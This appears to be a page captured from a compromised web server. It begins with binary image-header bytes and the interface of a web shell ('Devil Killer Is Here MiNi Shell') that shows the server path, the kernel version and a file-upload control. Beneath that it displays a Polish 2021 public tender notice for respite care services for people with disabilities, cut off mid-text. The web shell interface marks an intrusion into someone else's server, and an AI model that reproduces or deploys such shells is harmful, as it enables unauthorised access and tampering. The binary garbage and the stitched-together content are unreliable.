JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210625/0009601901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00096019 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi opieki wytchnieniowej w celu wsparcia członków rodzin lub opiekunów osób z niepełnosprawnością – edycja 2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejsko - Gminny Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690010550</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziszów Małopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(17) 22 16 588</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mgops@sedziszow-mlp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mgops.sedziszow-mlp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi opieki wytchnieniowej w celu wsparcia członków rodzin lub opiekunów osób z niepełnosprawnością – edycja 2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e5c4756-d516-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00096019</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sedziszowmalopolski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert (w<br/>tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty<br/>składające się na ofertę, o których mowa w SWZ i ustawie): Ofertę należy złożyć w sposób<br/>przewidziany w sekcji III.3.6. ogłoszenia. Ofertę wraz z załącznikami należy przesyłać drogą<br/>elektroniczną za pośrednictwem: https://platformazakupowa.pl (patrz: sekcja<br/>VIII.8.2 ogłoszenia) 2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy<br/>składania ofert): 1) w postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a<br/>Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień, podmiotowych<br/>środków dowodowych oraz przekazywanie informacji (innych niż wskazanych w ust. 1) odbywa się<br/>elektronicznie za pośrednictwem poczty elektronicznej (e-mail): mgops@sedziszow-mlp.pl; lub poprzez<br/>Platformę,dostępną pod adresem: https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Oferty(w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne<br/>dokumenty składające się na ofertę, o których mowa w SWZ i ustawie):1) Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować (zalogować)<br/>się<br/>na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania<br/>informatycznego pod adresem:<br/>https://platformazakupowa.pl/pn/sedziszowmalopolski;<br/>2) Zamawiający<br/>informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert, wielkości przesyłanych plików, odbierania<br/>dokumentów elektronicznych,zmiana lub wycofanie oferty oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców”<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje3) ofertę<br/>sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;4)<br/>wc<br/>elu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować zgodnie z<br/>instrukcjami dostępnymi u dostawcy rozwiązania informatycznego<br/>podadresem:https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view5) jeżeli<br/>dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,<br/>wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”;6)<br/>do oferty należy dołączyć dokumenty wymagane w ustawie oraz w SWZ, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku<br/>archiwum(ZIP);7) oferta może być złożona tylko do upływu terminu składania ofert;8) Wykonawca po<br/>upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty;9)<br/>dane postępowanie można wyszukać na Liście wszystkich postępowań pod<br/>adresem: https://platformazakupowa.pl ze strony głównej z zakładki Postępowania lub pod<br/>adresem: https://platformazakupowa.pl/pn/sedziszowmalopolski klikając opcję Postępowania.2.<br/>Sposób<br/>komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)1) w postępowaniu o<br/>udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz<br/>przekazywanie informacji (innych niż wskazanych w ust. 1) odbywa się elektronicznie za<br/>pośrednictwem<br/>poczty elektronicznej (e-mail) lub poprzez Platformę, dostępną pod<br/>adresem: https://platformazakupowa.pl 2) we wszelkiej korespondencji związanej z<br/>niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub<br/>numerem referencyjnym nadanym przez zamawiającego;3) adres poczty elektronicznej do<br/>komunikacji Wykonawców z Zamawiającym (e-mail): mgops@sedziszow-mlp.pl; 4) za datę<br/>przekazania<br/>oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz informacji (innych niż<br/>wskazanych w ust. 1) przyjmuje się datę ich przekazania na platformie -<br/>https://platformazakupowa.pl lub wpłynięcia na ww. adres poczty elektronicznej;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FK.261.I.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 17.1.	Wykonawca będzie zobowiązany do świadczenia 3 600 godzin usług opieki wytchnieniowej przez co najmniej 6 opiekunów, w okresie do 6 miesięcy od podpisania umowy, jednak nie później niż do 31.12.2021 r. <br/>17.2.	Odbiorcami wsparcia usługami opieki wytchnieniowej będzie co najmniej:<br/>- 7 dzieci z orzeczeniem o niepełnosprawności,<br/>- 15 osób z orzeczeniami o znacznym stopniu niepełnosprawności.<br/>17.3.	Wykonawca będzie zobowiązany do pozostawania w gotowości do świadczenia usługi opieki wytchnieniowej w danym miesiącu kalendarzowym, 7 dniw tygodniu, w godzinach od 7.00 do 22.00.<br/>17.4.	Limit godzin usług opieki wytchnienowej przypadający na jednego Uczestnika Programu wynosi około 30 godzin zegarowych miesięcznie a w okresie związania umową 180 godzin na jednego uczestnika.<br/>17.5.	W sytuacji nagłej/losowej/interwencyjnej usługa opieki wytchnieniowej może być przyznana bez Karty zgłoszenia do Programu Opieka – edycja 2021. Jednakże dokument ten powinien zostać uzupełniony niezwłocznie w terminie nie dłuższym niż 3 dni robocze od dnia wystąpienia tej sytuacji.<br/>17.6.	Pod opieką opiekuna świadczącego usługę opieki wytchnieniowej w tym samym czasie będzie pozostawać tylko 1 uczestnik Programu.<br/>17.7.	Wykonawca umożliwi rodzicom lub opiekunom osób niepełnosprawnych samodzielny wybór osoby, która będzie świadczyć usługę opieki wytchnieniowej. Wykonawca zobowiązany będzie otrzymać od Uczestnika oświadczenie zgodne z załącznikiem nr 1 do umowy o braku pokrewieństwa<br/>z osobą, która będzie świadczyć usługi w ramach Programu.<br/>17.8.	Wykonawca telefonicznie poinformuje Uczestnika lub wskazanego<br/>w zgłoszeniu członka rodziny o terminie, godzinie rozpoczęcia usług oraz<br/>o opiekunie mającym realizować usługi opieki wytchnieniowej przynajmniej jeden dzień przed rozpoczęciem realizacji usług.<br/>17.9.	W przypadku wyznaczenia zastępstwa Wykonawca telefonicznie poinformuje Uczestnika lub wskazanego w zgłoszeniu członka rodziny o terminie zastępstwa, godzinie świadczenia usług oraz opiekunie mającym realizować usługi przynajmniej jeden dzień przed zastępstwem, a w sytuacjach nagłych najpóźniej tego samego dnia, w którym usługa ma być realizowana. Ponadto<br/>w sytuacjach nagłych Wykonawca zobowiązuje się do zapewnienia zastępstwa z uwzględnieniem dotychczasowego grafiku opiekuna.<br/>17.10.	Wykonawca zobowiązany jest w ciągu 3 dni roboczych od wejścia w środowisko Uczestnika poinformować Zamawiającego telefonicznie lub za pomocą poczty elektronicznej o dniach i godzinach świadczenia usług, a także podać nazwisko opiekuna, który będzie świadczyć usługi oraz każdorazowo poinformować<br/>o zmianie opiekuna, dni i godzin świadczenia usług. Wykonawca zobowiązany jest posiadać w dokumentacji działalności usługowej potwierdzenie przekazania informacji o opiekunie.<br/>17.11.	W przypadku niemożności realizacji usług Wykonawca zobowiązany jest niezwłocznie poinformować o tym fakcie Uczestnika lub wskazanego<br/>w zgłoszeniu członka rodziny, a najpóźniej w dniu następnym po zaistnieniu zdarzenia poinformować telefonicznie lub za pomocą poczty elektronicznej Zamawiającego oraz podać przyczyny takiego stanu rzeczy. Wykonawca zobowiązany jest posiadać w dokumentacji działalności usługowej potwierdzenie przekazania informacji o niemożności realizacji usług.<br/>17.12.	W sytuacji rezygnacji Uczestnika z usług, wstrzymania usług lub zgonu podopiecznego Wykonawca zobowiązany jest w ciągu 2 dni roboczych poinformować telefonicznie lub za pomocą poczty elektronicznej Zamawiającego.<br/>17.13.	W sytuacji zakończenia świadczenia usług Zamawiający jest niezwłocznie informowany telefonicznie lub za pomocą poczty elektronicznej przez Wykonawcę o terminie zakończenia realizacji usług.<br/>17.14.	W sytuacjach interwencyjnych/nagłych dopuszcza się możliwość rozpoczęcia świadczenia usług przez Wykonawcę na podstawie zgłoszenia telefonicznego Zamawiającego. <br/>17.15.	Wykonawca zobowiązany jest prowadzić współpracę z pracownikiem socjalnym i innymi upoważnionymi pracownikami Zamawiającego. Przez współpracę rozumie się w szczególności wymianę informacji dotyczącą osób<br/>i rodzin objętych pomocą Zamawiającego i korzystających ze wsparcia w formie usług opieki wytchnieniowej dla osób niepełnosprawnych.<br/>17.16.	Wykonawca zobowiązany jest do prowadzenia karty realizacji usług (zwane dalej „Kartami”). Karta powinna być prowadzone na bieżąco, każdorazowo potwierdzana podpisem Uczestnika/opiekuna prawnego/członka rodziny lub osoby upoważnionej. Karta powinna być przejrzysta i czytelna, a wielkość rubryk powinna być odpowiednio dostosowana do wielkości podpisu składanego przez podopiecznego. Na koniec danego miesiąca Wykonawca zobowiązany będzie do rzetelnego podsumowania Kart. Karty powinny być przekazane przez Wykonawcę Zamawiającemu wraz z rachunkiem. Wykonawca załączy Karty do faktury/rachunku za wykonane usługi w danym miesiącu. Wzór karty stanowi załącznik nr 2 do umowy.<br/>17.17.	Obowiązkiem Wykonawcy będzie składanie Zamawiającemu miesięcznych raportów dotyczących liczby i zakresu zrealizowanych usług.<br/>17.18.	W przypadku skargi na usługi Wykonawca zobowiązuje się przesłać elektronicznie (z wykorzystaniem technik kryptograficznych) Zamawiającemu zeskanowaną kartę/karty realizacji usług wraz z wyjaśnieniami w terminie 2 dni od otrzymania informacji w tej sprawie, za wyjątkiem przypadków interwencyjnych, dla których konieczne jest natychmiastowe podjęcie działania.<br/>17.19.	Pełna dokumentacja działalności usługowej, osoby zatrudnione przez Wykonawcę i ich kwalifikacje, a także ocena jakości świadczonych przez Wykonawcę usług i jego personel w każdym czasie (tj. również w dni wolne od pracy) podlega kontroli Zamawiającego. Wykonawca zobowiązuje się w każdej chwili stworzyć warunki do kontroli i udostępnić dokumenty do wglądu.<br/>17.20.	Wszelka dokumentacja winna być prowadzona w sposób nie budzący zastrzeżeń, bez skreśleń i poprawek. W przypadku, gdy dokumentacja zawiera błędną treść lub liczby, poprawa powinna nastąpić poprzez skreślenie błędnej treści lub liczby, wpisanie obok prawidłowej treści lub liczby i zaparafowanie dokonanych poprawek wraz z pieczęcią Wykonawcy.<br/>17.21.	Wykonawca zobowiązany jest do przeprowadzania kontroli pracy opiekunów świadczących usługi w ilości nie mniejszej niż 2 razy w ciągu miesiąca, ze szczególnym uwzględnieniem dni wolnych od pracy. Z przeprowadzonej kontroli powinien zostać sporządzony protokół, który podpisuje opiekun<br/>i Uczestnik lub wskazany w zgłoszeniu członek rodziny. Protokół z kontroli przeprowadzonej w danym miesiącu należy przekazać do Zamawiającego do 5-go dnia następnego miesiąca.<br/>17.22.	Wykonawca zobowiązany jest do ochrony danych osobowych powierzonych przez Zamawiającego co uregulowane zostanie w umowie dot. powierzenia przetwarzania danych osobowych, której minimalny zakres danych został określony w załączniku nr 3 do umowy.<br/>17.23.	Zapłata nastąpi za faktycznie wykonaną liczbę godzin usług opieki wytchnieniowej w danym miesiącu i z tego tytułu Wykonawcy nie przysługują żadne roszczenia finansowe i prawne.<br/>17.24.	Zamawiający zastrzega sobie prawo kontroli realizacji zlecenia i w tym celu może zażądać niezbędnych dokumentów i informacji.<br/>17.25.	Zamawiający i Wykonawca przekażą sobie nawzajem elektronicznie numery telefonów kontaktowych i adresy mailowe oraz inne informacje i ustalenia niezbędne do sprawnego i terminowego wykonania zamówienia.<br/>17.26.	Koszt jednej godziny zegarowej wynagrodzenia z tytułu świadczenia usługi opiekuna nie może przekroczyć 35,00 zł brutto.<br/>17.27.	Koszty inne niż koszt usługi opieki wytchnienowej, w szczególności ponoszone przez opiekuna jak i Uczestnika nie są kosztami refundowanymi przez Zamawiającego.<br/>17.28.	Usługi opieki wytchnieniowej winny być świadczone przez co najmniej<br/>6 opiekunów posiadających:<br/>1)	dyplom potwierdzający uzyskanie kwalifikacji w zawodzie asystent osoby niepełnosprawnej/pielęgniarka lub innym, zapewniającym realizację usługi opieki wytchnieniowej w zakresie adekwatnym do indywidualnych potrzeb osoby niepełnosprawnej, lub<br/>2)	przynajmniej średnie wykształcenie posiadających, co najmniej roczne, udokumentowane doświadczenie w udzielaniu bezpośredniej pomocy/opieki osobom niepełnosprawnym.<br/>Numeracja przywołana w Sekcji 4.2.2.) wynika z numeracji przyjętej w SWZ.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków<br/>Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85311300-5 - Usługi opieki społecznej dla dzieci i młodzieży</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <p class="mb-0">85312110-3 - Usługi opieki dziennej nad dziećmi</p> <p class="mb-0">85312120-6 - Usługi opieki dziennej nad dziećmi i młodzieżą niepełnosprawną</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dysponowanie opiekunem świadczącym usługę opieki wytchnieniowej posiadającym kurs/szkolenie z pierwszej pomocy przedmedycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dysponowanie opiekunem świadczącym usługę opieki wytchnieniowej posiadającym dyplom potwierdzający uzyskanie kwalifikacji w zawodzie opiekun medyczny/ pielęgniarka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określono w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 1 800,00 zł (słownie: jeden tysiąc osiemset złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach 